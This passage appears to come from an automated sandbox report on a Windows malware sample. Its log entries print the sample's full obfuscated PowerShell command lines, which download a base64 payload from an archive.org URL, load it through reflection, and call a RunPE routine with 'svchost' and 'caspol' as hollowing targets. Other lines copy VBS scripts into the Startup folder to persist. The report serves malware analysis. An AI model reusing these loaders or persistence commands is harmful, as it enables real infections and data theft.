([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\escrivan.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/detah'+'notev'+'.txt{1};{0'+'}base64co'+'ntent '+'='+' '+'(new-ob'+'ject sy'+'st'+'em.ne'+'t.w'+'ebclie'+'nt).'+'downl'+'oadst'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'ycon'+'ten'+'t ='+' '+'[system.convert]'+'::'+'fromba'+'se64string({0}base'+'64con'+'tent);{0}asse'+'mbl'+'y '+'='+' [reflection.as'+'s'+'embly]::'+'lo'+'ad({0}bina'+'rycontent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.gett'+'yp'+'e({1}r'+'unpe'+'.ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.getmethod({1}va'+'i{1}'+');{0}'+'m'+'e'+'th'+'od.in'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gj1k'+'s'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}c'+'a'+'spo'+'l{1}'+',{1'+'}{'+'1}))')-f [char]36,[char]39) |iex" |
|
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\sys VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\sys VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\pow VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\pow VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\32 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\Public\Documents\32 VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
